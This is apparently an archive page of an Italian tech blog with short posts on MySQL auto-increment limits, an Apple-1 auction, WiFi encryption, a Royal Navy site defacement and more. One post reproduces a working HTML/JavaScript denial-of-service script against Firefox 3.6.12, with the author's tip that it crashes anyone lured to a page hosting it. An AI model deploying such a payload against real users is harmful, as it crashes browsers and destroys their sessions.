SIAMO GEEK

Autore: Luigi Rosa

  • Id autoincrementale delle tabelle MySQL

    Tabella giri-velocità / RPM-speed tablePremetto che sono un fan sfegatato degli id interi autoincrementali delle tabelle SQL usati come chiave primaria. Prima o poi tornano utili e fanno comunque comodo.

    Un collega qualche giorno fa mi ha detto di essere un po’ perplesso degli id autoincrementali per via del rischio di overflow.

    MySQL, infatti, in caso di raggiungimento del limite del contatore autoincrementale non permette di aggiungere ulteriori record. Non è una bella situazione. Mi sono deciso, quindi, a fare un paio di conti.

    Ipotizziamo un id autoincrementale di tipo UNSIGNED INT: abbiamo 4 byte di dati, pari a 32 bit pari a 4.294.967.295 in base decimale. Ipotizzando l’inserimento in una tabella di un milione di record al giorno (11 record al secondo) avremmo 4.295 giorni (poco meno di 12 anni) di vita della nostra tabella. Decisamente inaccettabile.

    Meglio utilizzare un id autoincrementale di tipo UNSIGNED BIGINT: 8 byte, 64 bit e 18.446.744.073.709.551.615 possibili valori. Se ipotizziamo un miliardo di record al giorno (11.500 al secondo) potremmo avere spazio di crescita per circa 25 milioni di anni. Potrebbe essere sufficiente.

  • 0day di Mozilla Firefox 3.6.12

    <!--

0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service

Credits:
Emanuele 'emgent' Gentili	<emgent@backtrack-linux.org>
Marco 'white_sheep' Rondini	<white_sheep@backtrack-linux.org>
Alessandro 'scox' Scoscia	<scox@backtrack.it>

-->

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>

<script>
var i=0;
for (i=0;i<=19999;i++)
{
document.write("a");
}

for (i=0;i<=3;i++)
{
document.write(document.body.innerHTML);
}

</script>

    Il simpatico script qui sopra blocca l’ultima versione di Mozilla Firefox, indipendentemente dal sistema operativo su cui gira.

    Basta, quindi, inserirlo in una pagina HTML, indurre qualcuno a visitare quella pagina e voilà gli avete bloccato Firefox, costringendolo a chiudere brutalmente il software e a perdere i riferimenti a tutti i tab aperti (ci sono persone che potrebbero uccidere per una perdita del genere attenzione!).

    Per ora si tratta solamente di un denial of service, non sono (ancora?) noti malware che sfruttano questo problema per altri scopi.

    Il problema è stato scoperto dal gruppo italiano Backtrack.

  • Un computer Apple a più di 200.000€

    È il prezzo che Christie’s stima per il prezzo d’asta della scheda di sistema numero 82 del primo modello di computer Apple, A.D. 1976.

    Completano il lotto all’asta una cassetta con l’interprete BASIC, la documentazione con il primo logo della società che ritraeva Sir Isaac Newton sotto il leggendario albero di mele e altre chicche storiche relative al prodotto.

  • La toppa peggio del buco

    Molti programmatori o professionisti dei computer sono dei pessimi dattilografi.

    Io per primo. Prima o poi fonderò un movimento per sostituire che con ceh, ma sto divagando.

    Damn You Auto Correct! è un sito che raccoglie (in inglese) le situazioni in cui uno spellcheck automatico non è proprio una buona idea (ricordate Word che metteva sempre in maiuscolo l’articolo plurale i?).

  • Fattore umano

    Improve a mechanical device and you may double productivity. But improve man, you gain a thousandfold. (Khan Noonien Singh, Space Seed)

    Ieri mattina l’elettricista del cliente dov’ero dice a me e ad un collega «Sentite, potete dire voi al giardiniere che non è una bella idea tenere la tanica di benzina del tagliaerba sopra al quadro generale [della corrente]? Quando glielo dico io mi risponde che per lui è comodo metterlo lì».

    Tre ore dopo un suo aiutante torna in ufficio per collegare l’UPS nuovo (una cosina da 10 kVA), una cosa che sarebbe dovuta durare un paio di minuti, tempo di collegare sei fili. Dopo 15 minuti era ancora lì con la faccia a punto interrogativo. Io e un collega ci avviciniamo e chiediamo se ci sono problemi. Per farla breve: dietro l’UPS c’è una chiave che abilita o disabilita il BYPASS. La chiave era su ON perché lui pensava che per accendere l’UPS tutto andasse su “ON”.

    Quanto sopra non per dire che l’utente non capisce niente, ma per ricordare quanto sia utile investire sulle persone perché, alla fine, sono loro che fanno la differenza.

  • Proteggere i WiFi liberi con una password nota

    Il rilascio di Firesheep ha evidenziato un problema noto delle connessioni WiFi senza password: i dati non vengono trasmessi in modo criptato.

    Chester Wisniewski, senior security advisor di Sophos, propone una soluzione elementare, che consiste nell’utilizzare il protocollo WPA2 con una password nota e unica per tutti: free.

    Un piccolo aggiornamento nel software dei client WiFi potrebbe fare in modo che il client provi quella password prima ancora di chiederla all’utente.

    In questo caso la password non serve ad impedire la connessione a chi non ha titolo per farlo, ma forza il protocollo a negoziare una chiave di cifratura univoca con ciascun terminale collegato, rendendo di fatto inutile un tool come Firesheep.

    Aggiornamento 17/2/2011 – Un aggiornamento della pagina di Naked Security linkata sopra rivela che questa soluzione non è percorribile e non deve essere utilizzata. Grazie a Paolo Attivissimo per avermi segnalato l’aggiornamento.

  • TRON

    [youtube=http://www.youtube.com/watch?v=d4RiUy23e9s&w=480]

    È stato, probabilmente assieme a Wargames, un cult dei primi fan della tecnologia informatica degli anni ’80.

    Non è più impossibile ricreare nello spettatore l’impatto visuale del film originale perché oramai la tecnologia delle immagini digitali è preponderante in questo tipo di produzioni e il metodo di produzione del TRON originale aveva poche scene digitali e moltissime elaborate un analogico con una tecnica usata, probabilmente, una sola volta.

    Però chi ha visto TRON al cinema e ha ancora un po’ di sense of wonder non credo riesca a rimanere del tutto indifferente davanti a queste immagini.

  • Vi ricorda qualcosa?

    Vi ricorda qualcosa questa immagine?

    La foto è stata scattata sulla Terra o su Coruscant?

    Qui c’è la risposta.

  • Nessuno è immune

    Il sito della Marina Militare britannica è stato hackerato, a fianco la riproduzione dell’immagine che ha sostituito il sito.

    In questo momento il sito con la sola immagine sta girando su in Internet Information Server 6.0.

    L’autore dell’azione sembra essere TinKode, non nuovo a questo tipo di attacchi verso siti con alta visibilità.

    L’attacco sembra aver avuto l’unico scopo di rivelare un problema. TinKode, infatti, si è limitato a rivelare le credenziali di amministratore del sito, senza impiantare del codice dannoso come è successo, per esempio, con il sito del premio Nobel per la pace. (altro…)

  • Ferrofluido in un campo magnetico

    L’immagine a lato tratta da questo articolo, dove si può vedere una versione più grande, mostra del ferrofluido immerso in un campo magnetico.

    Il ferrofliudo è una dispersione di particelle di un metallo ferromagnetico in un fluido, di solito un solvente organico o acqua.

    La foto a fianco, apparentemente non elaborata elettronicamente, è stata ottenuta esponendo una piccola quantità di ferrofliudo al campo magnetico generato da un magnete al neodimio, ferro, boro, terre rare (in inglese: neodymium iron-boron rare-earth magnet). Le cuspidi sono le linee di campo magnetico, che una volta tanto non sono delle righe in un diagramma.

  • Un tool essenziale per la vostra prossima presentazione di PowerPoint

    Signore e signori, il Generatore di Stronzate per la Web Economy.

    Inutile stare ancora su questa pagina, seguite il link!

  • Arriva la concorrenza

    Dopo gli annunci di Edigita e la discesa in campo di SIP Telecom, arriva finalmente uno store di eBook gestito da chi è stato tra i primi in Italia a credere nella tecnologia.

    Avevo visto lo stand di Simplicissimus due anni e mezzo fa alla fiera del libro di Torino, avevo provato i reader che distribuivano e… avevo ordinato subito dopo un Cybook Gen3.

    Due anni fa il fenomeno sembrava sul punto di scoppiare, ma vari eventi, credo dominati dalla congiuntura economica, hanno rinviato l’apertura delle danze a quest’anno. Poco male.

    Simplicissimus ha aperto STEALTH, una piattaforma di vendita di libri elettronici.

    (altro…)